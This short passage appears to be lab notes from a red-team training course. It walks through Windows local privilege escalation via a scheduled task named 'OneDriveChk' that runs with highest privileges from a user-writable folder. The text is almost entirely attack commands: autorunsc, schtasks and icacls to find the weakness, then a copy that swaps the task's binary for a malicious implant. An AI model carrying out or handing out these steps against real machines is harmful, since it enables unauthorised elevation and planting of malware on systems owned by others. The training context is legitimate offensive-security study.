First: Let’s try to find missing tasks

Autorunsc64.exe -a t | more

Second: Let’s get more information about that task

schtasks /query /tn OneDriveChk /xml

Notice that that task is running as this user and with the Highest Privilege and also we got the path of that binary

Third: Let’s check if we can write to that path

icacls C:\RTO\bin\

And yeah we have modified access

Fourth: Copy our malicious payload to that folder

copy C:\Users\IEUser\Desktop\LPE\implant\implant.exe C:\RTO\bin\OneDriveChk.exe